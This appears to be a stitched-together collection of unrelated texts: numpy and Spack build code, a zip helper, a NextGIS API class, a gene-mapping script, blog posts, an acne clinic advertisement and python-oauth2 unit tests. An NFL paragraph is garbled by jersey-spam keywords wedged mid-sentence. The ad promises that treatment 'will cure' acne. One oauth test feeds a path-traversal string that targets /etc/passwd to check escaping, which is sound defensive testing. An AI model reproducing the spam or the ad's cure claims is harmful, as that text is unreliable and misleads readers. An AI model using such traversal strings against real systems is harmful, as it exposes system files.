if obj in _abstract_types.values():
raise ValueError("Cannot count the bits of an abstract type")
# some third-party type - make a best-guess
return dtype(obj).itemsize * 8
else:
return info.bits
def bitname(obj):
"""Return a bit-width name for a given type object"""
bits = _bits_of(obj)
dt = dtype(obj)
char = dt.kind
base = _kind_name(dt)
if base == 'object':
bits = 0
if bits != 0:
char = "%s%d" % (char, bits // 8)
return base, bits, char
def _add_types():
for name, info in _concrete_typeinfo.items():
# define C-name and insert typenum and typechar references also
allTypes[name] = info.type
sctypeDict[name] = info.type
sctypeDict[info.char] = info.type
sctypeDict[info.num] = info.type
for name, cls in _abstract_types.items():
allTypes[name] = cls
_add_types()
# This is the priority order used to assign the bit-sized NPY_INTxx names, which
# must match the order in npy_common.h in order for NPY_INTxx and np.intxx to be
# consistent.
# If two C types have the same size, then the earliest one in this list is used
# as the sized name.
_int_ctypes = ['long', 'longlong', 'int', 'short', 'byte']
_uint_ctypes = list('u' + t for t in _int_ctypes)
def _add_aliases():
for name, info in _concrete_typeinfo.items():
# these are handled by _add_integer_aliases
if name in _int_ctypes or name in _uint_ctypes:
continue
# insert bit-width version for this class (if relevant)
base, bit, char = bitname(info.type)
myname = "%s%d" % (base, bit)
# ensure that (c)longdouble does not overwrite the aliases assigned to
# (c)double
if name in ('longdouble', 'clongdouble') and myname in allTypes:
continue
allTypes[myname] = info.type
# add mapping for both the bit name and the numarray name
sctypeDict[myname] = info.type
# add forward, reverse, and string mapping to numarray
sctypeDict[char] = info.type
# Add deprecated numeric-style type aliases manually, at some point
# we may want to deprecate the lower case "bytes0" version as well.
for name in ["Bytes0", "Datetime64", "Str0", "Uint32", "Uint64"]:
if english_lower(name) not in allTypes:
# Only one of Uint32 or Uint64, aliases of `np.uintp`, was (and is) defined, note that this
# is not UInt32/UInt64 (capital i), which is removed.
continue
allTypes[name] = allTypes[english_lower(name)]
sctypeDict[name] = sctypeDict[english_lower(name)]
_add_aliases()
def _add_integer_aliases():
seen_bits = set()
for i_ctype, u_ctype in zip(_int_ctypes, _uint_ctypes):
i_info = _concrete_typeinfo[i_ctype]
u_info = _concrete_typeinfo[u_ctype]
bits = i_info.bits # same for both
for info, charname, intname in [
(i_info,'i%d' % (bits//8,), 'int%d' % bits),
(u_info,'u%d' % (bits//8,), 'uint%d' % bits)]:
if bits not in seen_bits:
# sometimes two different types have the same number of bits
# if so, the one iterated over first takes precedence
allTypes[intname] = info.type
sctypeDict[intname] = info.type
sctypeDict[charname] = info.type
seen_bits.add(bits)
_add_integer_aliases()
# We use these later
void = allTypes['void']
#
# Rework the Python names (so that float and complex and int are consistent
# with Python usage)
#
def _set_up_aliases():
type_pairs = [('complex_', 'cdouble'),
('int0', 'intp'),
('uint0', 'uintp'),
('single', 'float'),
('csingle', 'cfloat'),
('singlecomplex', 'cfloat'),
('float_', 'double'),
('intc', 'int'),
('uintc', 'uint'),
('int_', 'long'),
('uint', 'ulong'),
('cfloat', 'cdouble'),
('longfloat', 'longdouble'),
('clongfloat', 'clongdouble'),
('longcomplex', 'clongdouble'),
('bool_', 'bool'),
('bytes_', 'string'),
('string_', 'string'),
('str_', 'unicode'),
('unicode_', 'unicode'),
('object_', 'object')]
for alias, t in type_pairs:
allTypes[alias] = allTypes[t]
sctypeDict[alias] = sctypeDict[t]
# Remove aliases overriding python types and modules
to_remove = ['ulong', 'object', 'int', 'float',
'complex', 'bool', 'string', 'datetime', 'timedelta',
'bytes', 'str']
for t in to_remove:
try:
del allTypes[t]
del sctypeDict[t]
except KeyError:
pass
_set_up_aliases()
sctypes = {'int': [],
'uint':[],
'float':[],
'complex':[],
'others':[bool, object, bytes, unicode, void]}
def _add_array_type(typename, bits):
try:
t = allTypes['%s%d' % (typename, bits)]
except KeyError:
pass
else:
sctypes[typename].append(t)
def _set_array_types():
ibytes = [1, 2, 4, 8, 16, 32, 64]
fbytes = [2, 4, 8, 10, 12, 16, 32, 64]
for bytes in ibytes:
bits = 8*bytes
_add_array_type('int', bits)
_add_array_type('uint', bits)
for bytes in fbytes:
bits = 8*bytes
_add_array_type('float', bits)
_add_array_type('complex', 2*bits)
_gi = dtype('p')
if _gi.type not in sctypes['int']:
indx = 0
sz = _gi.itemsize
_lst = sctypes['int']
while (indx < len(_lst) and sz >= _lst[indx](0).itemsize):
indx += 1
sctypes['int'].insert(indx, _gi.type)
sctypes['uint'].insert(indx, dtype('P').type)
_set_array_types()
# Add additional strings to the sctypeDict
_toadd = ['int', 'float', 'complex', 'bool', 'object',
'str', 'bytes', ('a', 'bytes_')]
for name in _toadd:
if isinstance(name, tuple):
sctypeDict[name[0]] = allTypes[name[1]]
else:
sctypeDict[name] = allTypes['%s_' % name]
del _toadd, name
|
So the actual possibility that Gruden or Jackson could be in play for nfl jersey sales decline visual network simulator 2 the Bengals has complicated the situations in Washington and Cleveland. It is a comparatively stress free situation for Gruden, as long as he has a contract with the Redskins that runs through 2020. it's often nice to be wanted nfl jerseys mens dallas cowboys 55 action picture cars nyc and even nicer to have guaranteed money lined up. But it all adds a bit more complexity and drama to a Redskins offseason that will not be lacking in either.
norway Dolphins1. do something about Jarvis Landry. The problem cheapnfljerseysauthentics scamper barrel horse no bridle with the Dolphins franchising Landry isn't wanting to have their slot receiver around. He's the player, And the Dolphins have relied on him to make plays to keep their cheap nfl jerseys for sale 14534 voting offense going for stretches over the past three seasons. Landry's franchise tag comes in around $16 cheap jerseys china store fake purchaseshield million, Which isn't unreasonable for a player with Landry's production on paper.
NFL coaches are shifting toward a more analytical approach in other methods, too. Going for it on fourth and short cheap basketball jerseys ukers directory is starting to be more common, As is function passing attempts on first down. During the first five weeks of the 2017 season there have been nfl jerseys for kids steelers pajamas ladies seersucker 1,964 nfl jersey number rules 2017 nba championship pictures pass makes an attempt on first down; A year later have been 2,277. It appears data is changing the game for the better, And it is nfl jersey swap tutorial hijab wisuda 2016 calendar only just time before the entire NFL follows suit. |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015, Jim Miller
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, zipfile, sys
from glob import glob
def addFolderToZip(myZipFile,folder,exclude=[]):
folder = folder.encode('ascii') #convert path to ascii for ZipFile Method
excludelist=[]
for ex in exclude:
excludelist.extend(glob(folder+"/"+ex))
for file in glob(folder+"/*"):
if file in excludelist:
continue
if os.path.isfile(file):
#print file
myZipFile.write(file, file, zipfile.ZIP_DEFLATED)
elif os.path.isdir(file):
addFolderToZip(myZipFile,file,exclude=exclude)
def createZipFile(filename,mode,files,exclude=[]):
myZipFile = zipfile.ZipFile( filename, mode ) # Open the zip file for writing
excludelist=[]
for ex in exclude:
excludelist.extend(glob(ex))
for file in files:
if file in excludelist:
continue
file = file.encode('ascii') #convert path to ascii for ZipFile Method
if os.path.isfile(file):
(filepath, filename) = os.path.split(file)
#print file
myZipFile.write( file, filename, zipfile.ZIP_DEFLATED )
if os.path.isdir(file):
addFolderToZip(myZipFile,file,exclude=exclude)
myZipFile.close()
return (1,filename)
|
When I was a teen I loved Anne Rice and all things broody and sensuous. I embraced this persona as though I had found myself. It worked really well with angsty teen emotion and the desire to know who I was.
Recently though, I had this moment of clarity where I differentiated between defining yourself vs finding yourself. Defining yourself is external- it's a conscious act of putting on a mask to show the world who you want to be, and hopefully they'll believe what they see; finding yourself is completely internal- it hits without warning, and it's finding absolute peace and elation with who you are.
I've only recently found myself, and while it's certainly an ongoing adventure, I can honestly say that I stumbled across this new me rather than sought her out. It's genuine. There is such a zen quality to this sort of self-discovery!
And of course I'm passionate about blogging and writing for children! The notion of writing for profit elates me beyond my wildest dreams! Now that I've taken solace in who I am and what I want, I don't think it will long before my dreams become a reality!
Love it! Love your blog! Follow your dreams... Xoxo.
God I tell you I still think she wrote the best of the vampire books.
You are going to succeed Jen. You see it already and that is half of the battle. |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
NextGIS WEB API
-------------------
begin : 2014-11-19
git sha : $Format:%H$
copyright : (C) 2014 by NextGIS
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
FEATURE_ATTACHMENT_URL = lambda res_id, feature_id, attachment_id: '/api/resource/%d/feature/%d/attachment/%d' % (res_id, feature_id, attachment_id)
IMAGE_URL = lambda res_id, feature_id, image_id: '/api/resource/%s/feature/%d/attachment/%d/image' % (res_id, feature_id, image_id)
class NGWAttachment(object):
def __init__(self, attachment_id, ngw_feature):
self.id = attachment_id
self.ngw_feature = ngw_feature
def get_attachmet_url(self):
return FEATURE_ATTACHMENT_URL(self.ngw_feature.ngw_resource.common.id, self.ngw_feature.id, self.id)
def unlink(self):
self.ngw_feature.ngw_resource._res_factory.connection.delete(self.get_attachmet_url())
def get_image_url(self):
return IMAGE_URL(self.ngw_feature.ngw_resource.common.id, self.ngw_feature.id, self.id)
def get_image_full_url(self):
return self.ngw_feature.ngw_resource._res_factory.connection.server_url + self.get_image_url()
def get_image(self):
attachment_info = self.ngw_feature.ngw_resource._res_factory.connection.get( self.get_attachmet_url() )
name = attachment_info['name']
if name is None:
name = "image_%d"%attachment_info['id']
format = attachment_info['mime_type'].split('/')
if len(format) == 2:
format = format[1]
else:
format = "jpeg"
file_contetnt = self.ngw_feature.ngw_resource._res_factory.connection.download_file( self.get_image_url() )
return [name, format, file_contetnt] |
As of this moment in time, I am recovering from basically a heart failure episode that occurred in Feb of 2019. I am slowly regaining strength and working on musical ideas that are popping in my head. I will also be returning to live performances by 2020. Putting together the right combination of players, which is tough, considering what I do). But there are some great players out there for sure.
I am hoping to see you all soon digging the Guitaristic Vibes. |
import csv
import sys
#abrimos el archivo en donde estan los Affy_id y geneSymbol
id_gene = csv.reader(open("id_gene_HG.csv", 'rb'), delimiter = ',')
dict = {}
aff_id = []
#metemos en un diccionario todas la entradas del archivo y en arreglo auxiliar solo los Affy_id para posteriormente iterar en el diccionario las entradas
for row in id_gene:
dict[row[0]] = row[1]
aff_id.append(row[0])
#borramos la primera entrada del diccionario que son los encabezados
aff_id.remove("Probe Set ID")
del dict["Probe Set ID"]
#abrimos el archivo donde estan los p.value y loads lo pasamos a arreglos
name_pvalue = open("name_pvalue_1191.txt", 'rb')
name = []
pv = []
loads = []
for row in name_pvalue:
p = row.split("\t")
name.append(p[0])
pv.append(p[2])
loads.append(p[1].strip())
#cerramos el archivo
name_pvalue.close()
#y abrimos un nuevo archivo para escribir las salidas:
salida = open("id_loads.txt", "w") #sera mejor escribirlo con cvs?????
#escribimos el encabezado
salida.writelines(["Affy_id","\t\t", "gene_symbol", "\n"])
#hago split por cada entrada del diccionario
for entry in aff_id:
#print (entry, "--->" ,dict[entry])
sp = dict[entry].split(" /// ")
aux = []
#ahora por cada entrada de sp busco en el archivo y extraigo su p_value para compararlos
for chunk in sp:
for i in range(len(name)):
#print (name[i].replace("\"",""), chunk)
if name[i].replace("\"","") == chunk :
aux.append([name[i],pv[i],loads[i]])
break
#comparo los p_values y me quedo con el mas chico
if len(aux) == 0:
salida.writelines([entry,"\t\t"," NF ", "\n"])
print "paso 0"
elif len(aux) == 1:
salida.writelines([entry,"\t\t", aux[0][0], "\n"])
print "paso 1"
else:
m = 0
for i in range(len(aux)-1):
if aux[i][2] < aux[i+1][2]:
m = i
else:
m = i+1
'''
val, idx = min((val, idx) for (idx, val) in enumerate(aux))
'''
print "paso 2"
print m
salida.writelines([entry,"\t\t", aux[m][0], "\n"])
#cerramos el archivo de salida
salida.close()
|
Currently, 50 million Americans suffer from acne—it’s the most common skin condition. You’re not alone if you have this condition, and you know more than anyone that it can be more than just a physical issue—but also a mental issue. Acne can cause semi-permanent or permanent skin scarring, low self-esteem, poor self-image, depression and anxiety. You may even avoid social gatherings, your loved ones, and friends. With acne dermatology in Santa Monica, you can cure this life hampering issue.
Acne dermatology in Santa Monica can change your life. But what causes acne? There are a number of different kinds of acne that acne dermatology in Santa Monica can address. Acne vulgaris or simple acne includes whiteheads, blackheads and pimples. All of these are caused by dead skin cells and oil clogging hair follicles. Genetics are believed to contribute tremendously to acne and the need for acne dermatology in Santa Monica. Comedonal acne is caused by oil and debris clogging pores and include skin colored bumps commonly found on the forehead and chin. These bumps are called comodones, also known as blackheads. Hormonal acne is often experienced by women and teenagers and is caused by hormones which trigger facial oil production. Menstral cycles can be a time in which women experience flare ups. Inflammatory acne consists of red bumps and pustules that are not whiteheads, blackheads or comedones and likely have to be treated by acne dermatology in Santa Monica. Cystic acne is not infected and is difficult to treat without professional assitance. This kind of acne can be serious and may need treatment by acne dermatology in Santa Monica.
Certain foods are likely to cause acne and the need for acne dermatology in Santa Monica. While there isn’t any definitive research proving which foods cause acne, there are a number of foods that are under suspicion of causing this condition. It’s believed that foods with high-glycemic index such as potatoes, pasta, bread, rice and desserts as well as dairy products, whey protein supplements and sweets can worsen existing acne. Overactive oil glands, medications such as corticosteroids and lithium, consuming junk food and smoking all contribute to acne.
In order to tackle the issue of acne, it’s important to address the causation. Many over the counter products will not address certain kinds of acne, such as cystic acne. You must use the right face wash, moisturizer and other products.
You could take topical or oral antibiotics as to solve your acne issue. There are medications available, such as minocycline, which addresses severe acne, doxycycline for regular acne, spironolactone which reduces oil production in the skin, oral contraceptives with estrogen which address hormonal acne and isotretinoin which comes in pill form and also addresses severe acne.
Acne dermatology in Santa Monica will cure your skin issues. Visit Batra Skincare online at www.batraskincare.com or call (310) 829-9099. |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import inspect
import os
import platform
import re
import spack.build_environment
from llnl.util.filesystem import working_dir
from spack.util.environment import filter_system_paths
from spack.directives import depends_on, variant
from spack.package import PackageBase, InstallError, run_after
# Regex to extract the primary generator from the CMake generator
# string.
_primary_generator_extractor = re.compile(r'(?:.* - )?(.*)')
def _extract_primary_generator(generator):
"""Use the compiled regex _primary_generator_extractor to extract the
primary generator from the generator string which may contain an
optional secondary generator.
"""
primary_generator = _primary_generator_extractor.match(generator).group(1)
return primary_generator
class CMakePackage(PackageBase):
"""Specialized class for packages built using CMake
For more information on the CMake build system, see:
https://cmake.org/cmake/help/latest/
This class provides three phases that can be overridden:
1. :py:meth:`~.CMakePackage.cmake`
2. :py:meth:`~.CMakePackage.build`
3. :py:meth:`~.CMakePackage.install`
They all have sensible defaults and for many packages the only thing
necessary will be to override :py:meth:`~.CMakePackage.cmake_args`.
For a finer tuning you may also override:
+-----------------------------------------------+--------------------+
| **Method** | **Purpose** |
+===============================================+====================+
| :py:meth:`~.CMakePackage.root_cmakelists_dir` | Location of the |
| | root CMakeLists.txt|
+-----------------------------------------------+--------------------+
| :py:meth:`~.CMakePackage.build_directory` | Directory where to |
| | build the package |
+-----------------------------------------------+--------------------+
The generator used by CMake can be specified by providing the
generator attribute. Per
https://cmake.org/cmake/help/git-master/manual/cmake-generators.7.html,
the format is: [<secondary-generator> - ]<primary_generator>. The
full list of primary and secondary generators supported by CMake may
be found in the documentation for the version of CMake used;
however, at this time Spack supports only the primary generators
"Unix Makefiles" and "Ninja." Spack's CMake support is agnostic with
respect to primary generators. Spack will generate a runtime error
if the generator string does not follow the prescribed format, or if
the primary generator is not supported.
"""
#: Phases of a CMake package
phases = ['cmake', 'build', 'install']
#: This attribute is used in UI queries that need to know the build
#: system base class
build_system_class = 'CMakePackage'
build_targets = []
install_targets = ['install']
build_time_test_callbacks = ['check']
#: The build system generator to use.
#:
#: See ``cmake --help`` for a list of valid generators.
#: Currently, "Unix Makefiles" and "Ninja" are the only generators
#: that Spack supports. Defaults to "Unix Makefiles".
#:
#: See https://cmake.org/cmake/help/latest/manual/cmake-generators.7.html
#: for more information.
generator = 'Unix Makefiles'
# https://cmake.org/cmake/help/latest/variable/CMAKE_BUILD_TYPE.html
variant('build_type', default='RelWithDebInfo',
description='CMake build type',
values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
depends_on('cmake', type='build')
@property
def archive_files(self):
"""Files to archive for packages based on CMake"""
return [os.path.join(self.build_directory, 'CMakeCache.txt')]
@property
def root_cmakelists_dir(self):
"""The relative path to the directory containing CMakeLists.txt
This path is relative to the root of the extracted tarball,
not to the ``build_directory``. Defaults to the current directory.
:return: directory containing CMakeLists.txt
"""
return self.stage.source_path
@property
def std_cmake_args(self):
"""Standard cmake arguments provided as a property for
convenience of package writers
:return: standard cmake arguments
"""
# standard CMake arguments
std_cmake_args = CMakePackage._std_args(self)
std_cmake_args += getattr(self, 'cmake_flag_args', [])
return std_cmake_args
@staticmethod
def _std_args(pkg):
"""Computes the standard cmake arguments for a generic package"""
try:
generator = pkg.generator
except AttributeError:
generator = 'Unix Makefiles'
# Make sure a valid generator was chosen
valid_primary_generators = ['Unix Makefiles', 'Ninja']
primary_generator = _extract_primary_generator(generator)
if primary_generator not in valid_primary_generators:
msg = "Invalid CMake generator: '{0}'\n".format(generator)
msg += "CMakePackage currently supports the following "
msg += "primary generators: '{0}'".\
format("', '".join(valid_primary_generators))
raise InstallError(msg)
try:
build_type = pkg.spec.variants['build_type'].value
except KeyError:
build_type = 'RelWithDebInfo'
define = CMakePackage.define
args = [
'-G', generator,
define('CMAKE_INSTALL_PREFIX', pkg.prefix),
define('CMAKE_BUILD_TYPE', build_type),
]
if primary_generator == 'Unix Makefiles':
args.append(define('CMAKE_VERBOSE_MAKEFILE', True))
if platform.mac_ver()[0]:
args.extend([
define('CMAKE_FIND_FRAMEWORK', "LAST"),
define('CMAKE_FIND_APPBUNDLE', "LAST"),
])
# Set up CMake rpath
args.extend([
define('CMAKE_INSTALL_RPATH_USE_LINK_PATH', False),
define('CMAKE_INSTALL_RPATH',
spack.build_environment.get_rpaths(pkg)),
])
# CMake's find_package() looks in CMAKE_PREFIX_PATH first, help CMake
# to find immediate link dependencies in right places:
deps = [d.prefix for d in
pkg.spec.dependencies(deptype=('build', 'link'))]
deps = filter_system_paths(deps)
args.append(define('CMAKE_PREFIX_PATH', deps))
return args
@staticmethod
def define(cmake_var, value):
"""Return a CMake command line argument that defines a variable.
The resulting argument will convert boolean values to OFF/ON
and lists/tuples to CMake semicolon-separated string lists. All other
values will be interpreted as strings.
Examples:
.. code-block:: python
[define('BUILD_SHARED_LIBS', True),
define('CMAKE_CXX_STANDARD', 14),
define('swr', ['avx', 'avx2'])]
will generate the following configuration options:
.. code-block:: console
["-DBUILD_SHARED_LIBS:BOOL=ON",
"-DCMAKE_CXX_STANDARD:STRING=14",
"-DSWR:STRING=avx;avx2]
"""
# Create a list of pairs. Each pair includes a configuration
# option and whether or not that option is activated
if isinstance(value, bool):
kind = 'BOOL'
value = "ON" if value else "OFF"
else:
kind = 'STRING'
if isinstance(value, (list, tuple)):
value = ";".join(str(v) for v in value)
else:
value = str(value)
return "".join(["-D", cmake_var, ":", kind, "=", value])
def define_from_variant(self, cmake_var, variant=None):
"""Return a CMake command line argument from the given variant's value.
The optional ``variant`` argument defaults to the lower-case transform
of ``cmake_var``.
This utility function is similar to
:py:meth:`~.AutotoolsPackage.with_or_without`.
Examples:
Given a package with:
.. code-block:: python
variant('cxxstd', default='11', values=('11', '14'),
multi=False, description='')
variant('shared', default=True, description='')
variant('swr', values=any_combination_of('avx', 'avx2'),
description='')
calling this function like:
.. code-block:: python
[define_from_variant('BUILD_SHARED_LIBS', 'shared'),
define_from_variant('CMAKE_CXX_STANDARD', 'cxxstd'),
define_from_variant('SWR')]
will generate the following configuration options:
.. code-block:: console
["-DBUILD_SHARED_LIBS:BOOL=ON",
"-DCMAKE_CXX_STANDARD:STRING=14",
"-DSWR:STRING=avx;avx2]
for ``<spec-name> cxxstd=14 +shared swr=avx,avx2``
"""
if variant is None:
variant = cmake_var.lower()
if variant not in self.variants:
raise KeyError(
'"{0}" is not a variant of "{1}"'.format(variant, self.name))
value = self.spec.variants[variant].value
if isinstance(value, (tuple, list)):
# Sort multi-valued variants for reproducibility
value = sorted(value)
return self.define(cmake_var, value)
def flags_to_build_system_args(self, flags):
"""Produces a list of all command line arguments to pass the specified
compiler flags to cmake. Note CMAKE does not have a cppflags option,
so cppflags will be added to cflags, cxxflags, and fflags to mimic the
behavior in other tools."""
# Has to be dynamic attribute due to caching
setattr(self, 'cmake_flag_args', [])
flag_string = '-DCMAKE_{0}_FLAGS={1}'
langs = {'C': 'c', 'CXX': 'cxx', 'Fortran': 'f'}
# Handle language compiler flags
for lang, pre in langs.items():
flag = pre + 'flags'
# cmake has no explicit cppflags support -> add it to all langs
lang_flags = ' '.join(flags.get(flag, []) + flags.get('cppflags',
[]))
if lang_flags:
self.cmake_flag_args.append(flag_string.format(lang,
lang_flags))
# Cmake has different linker arguments for different build types.
# We specify for each of them.
if flags['ldflags']:
ldflags = ' '.join(flags['ldflags'])
ld_string = '-DCMAKE_{0}_LINKER_FLAGS={1}'
# cmake has separate linker arguments for types of builds.
for type in ['EXE', 'MODULE', 'SHARED', 'STATIC']:
self.cmake_flag_args.append(ld_string.format(type, ldflags))
# CMake has libs options separated by language. Apply ours to each.
if flags['ldlibs']:
libs_flags = ' '.join(flags['ldlibs'])
libs_string = '-DCMAKE_{0}_STANDARD_LIBRARIES={1}'
for lang in langs:
self.cmake_flag_args.append(libs_string.format(lang,
libs_flags))
@property
def build_directory(self):
"""Returns the directory to use when building the package
:return: directory where to build the package
"""
return os.path.join(self.stage.path, 'spack-build')
def cmake_args(self):
"""Produces a list containing all the arguments that must be passed to
cmake, except:
* CMAKE_INSTALL_PREFIX
* CMAKE_BUILD_TYPE
which will be set automatically.
:return: list of arguments for cmake
"""
return []
def cmake(self, spec, prefix):
"""Runs ``cmake`` in the build directory"""
options = self.std_cmake_args
options += self.cmake_args()
options.append(os.path.abspath(self.root_cmakelists_dir))
with working_dir(self.build_directory, create=True):
inspect.getmodule(self).cmake(*options)
def build(self, spec, prefix):
"""Make the build targets"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
inspect.getmodule(self).make(*self.build_targets)
elif self.generator == 'Ninja':
self.build_targets.append("-v")
inspect.getmodule(self).ninja(*self.build_targets)
def install(self, spec, prefix):
"""Make the install targets"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
inspect.getmodule(self).make(*self.install_targets)
elif self.generator == 'Ninja':
inspect.getmodule(self).ninja(*self.install_targets)
run_after('build')(PackageBase._run_default_build_time_test_callbacks)
def check(self):
"""Searches the CMake-generated Makefile for the target ``test``
and runs it if found.
"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
self._if_make_target_execute('test',
jobs_env='CTEST_PARALLEL_LEVEL')
self._if_make_target_execute('check')
elif self.generator == 'Ninja':
self._if_ninja_target_execute('test',
jobs_env='CTEST_PARALLEL_LEVEL')
self._if_ninja_target_execute('check')
# Check that self.prefix is there after installation
run_after('install')(PackageBase.sanity_check_prefix)
|
"briefing-note." YourDictionary, n.d. Web. 11 April 2019. <https://www.yourdictionary.com/briefing-note>. |
"""
The MIT License
Copyright (c) 2009 Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys, os
sys.path[0:0] = [os.path.join(os.path.dirname(__file__), ".."),]
import unittest
import oauth2 as oauth
import random
import time
import urllib
import urlparse
from types import ListType
import mox
import httplib2
# Fix for python2.5 compatibility
try:
from urlparse import parse_qs, parse_qsl
except ImportError:
from cgi import parse_qs, parse_qsl
class TestError(unittest.TestCase):
def test_message(self):
try:
raise oauth.Error
except oauth.Error, e:
self.assertEqual(e.message, 'OAuth error occured.')
msg = 'OMG THINGS BROKE!!!!'
try:
raise oauth.Error(msg)
except oauth.Error, e:
self.assertEqual(e.message, msg)
class TestGenerateFunctions(unittest.TestCase):
def test_build_auth_header(self):
header = oauth.build_authenticate_header()
self.assertEqual(header['WWW-Authenticate'], 'OAuth realm=""')
self.assertEqual(len(header), 1)
realm = 'http://example.myrealm.com/'
header = oauth.build_authenticate_header(realm)
self.assertEqual(header['WWW-Authenticate'], 'OAuth realm="%s"' %
realm)
self.assertEqual(len(header), 1)
def test_escape(self):
string = 'http://whatever.com/~someuser/?test=test&other=other'
self.assert_('~' in oauth.escape(string))
string = '../../../../../../../etc/passwd'
self.assert_('../' not in oauth.escape(string))
def test_gen_nonce(self):
nonce = oauth.generate_nonce()
self.assertEqual(len(nonce), 8)
nonce = oauth.generate_nonce(20)
self.assertEqual(len(nonce), 20)
def test_gen_verifier(self):
verifier = oauth.generate_verifier()
self.assertEqual(len(verifier), 8)
verifier = oauth.generate_verifier(16)
self.assertEqual(len(verifier), 16)
def test_gen_timestamp(self):
exp = int(time.time())
now = oauth.generate_timestamp()
self.assertEqual(exp, now)
class TestConsumer(unittest.TestCase):
def setUp(self):
self.key = 'my-key'
self.secret = 'my-secret'
self.consumer = oauth.Consumer(key=self.key, secret=self.secret)
def test_init(self):
self.assertEqual(self.consumer.key, self.key)
self.assertEqual(self.consumer.secret, self.secret)
def test_basic(self):
self.assertRaises(ValueError, lambda: oauth.Consumer(None, None))
self.assertRaises(ValueError, lambda: oauth.Consumer('asf', None))
self.assertRaises(ValueError, lambda: oauth.Consumer(None, 'dasf'))
def test_str(self):
res = dict(parse_qsl(str(self.consumer)))
self.assertTrue('oauth_consumer_key' in res)
self.assertTrue('oauth_consumer_secret' in res)
self.assertEquals(res['oauth_consumer_key'], self.consumer.key)
self.assertEquals(res['oauth_consumer_secret'], self.consumer.secret)
class TestToken(unittest.TestCase):
def setUp(self):
self.key = 'my-key'
self.secret = 'my-secret'
self.token = oauth.Token(self.key, self.secret)
def test_basic(self):
self.assertRaises(ValueError, lambda: oauth.Token(None, None))
self.assertRaises(ValueError, lambda: oauth.Token('asf', None))
self.assertRaises(ValueError, lambda: oauth.Token(None, 'dasf'))
def test_init(self):
self.assertEqual(self.token.key, self.key)
self.assertEqual(self.token.secret, self.secret)
self.assertEqual(self.token.callback, None)
self.assertEqual(self.token.callback_confirmed, None)
self.assertEqual(self.token.verifier, None)
def test_set_callback(self):
self.assertEqual(self.token.callback, None)
self.assertEqual(self.token.callback_confirmed, None)
cb = 'http://www.example.com/my-callback'
self.token.set_callback(cb)
self.assertEqual(self.token.callback, cb)
self.assertEqual(self.token.callback_confirmed, 'true')
self.token.set_callback(None)
self.assertEqual(self.token.callback, None)
# TODO: The following test should probably not pass, but it does
# To fix this, check for None and unset 'true' in set_callback
# Additionally, should a confirmation truly be done of the callback?
self.assertEqual(self.token.callback_confirmed, 'true')
def test_set_verifier(self):
self.assertEqual(self.token.verifier, None)
v = oauth.generate_verifier()
self.token.set_verifier(v)
self.assertEqual(self.token.verifier, v)
self.token.set_verifier()
self.assertNotEqual(self.token.verifier, v)
self.token.set_verifier('')
self.assertEqual(self.token.verifier, '')
def test_get_callback_url(self):
self.assertEqual(self.token.get_callback_url(), None)
self.token.set_verifier()
self.assertEqual(self.token.get_callback_url(), None)
cb = 'http://www.example.com/my-callback?save=1&return=true'
v = oauth.generate_verifier()
self.token.set_callback(cb)
self.token.set_verifier(v)
url = self.token.get_callback_url()
verifier_str = '&oauth_verifier=%s' % v
self.assertEqual(url, '%s%s' % (cb, verifier_str))
cb = 'http://www.example.com/my-callback-no-query'
v = oauth.generate_verifier()
self.token.set_callback(cb)
self.token.set_verifier(v)
url = self.token.get_callback_url()
verifier_str = '?oauth_verifier=%s' % v
self.assertEqual(url, '%s%s' % (cb, verifier_str))
def test_to_string(self):
string = 'oauth_token_secret=%s&oauth_token=%s' % (self.secret,
self.key)
self.assertEqual(self.token.to_string(), string)
self.token.set_callback('http://www.example.com/my-callback')
string += '&oauth_callback_confirmed=true'
self.assertEqual(self.token.to_string(), string)
def _compare_tokens(self, new):
self.assertEqual(self.token.key, new.key)
self.assertEqual(self.token.secret, new.secret)
# TODO: What about copying the callback to the new token?
# self.assertEqual(self.token.callback, new.callback)
self.assertEqual(self.token.callback_confirmed,
new.callback_confirmed)
# TODO: What about copying the verifier to the new token?
# self.assertEqual(self.token.verifier, new.verifier)
def test_to_string(self):
tok = oauth.Token('tooken', 'seecret')
self.assertEqual(str(tok), 'oauth_token_secret=seecret&oauth_token=tooken')
def test_from_string(self):
self.assertRaises(ValueError, lambda: oauth.Token.from_string(''))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('blahblahblah'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('blah=blah'))
self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token_secret=asfdasf'))
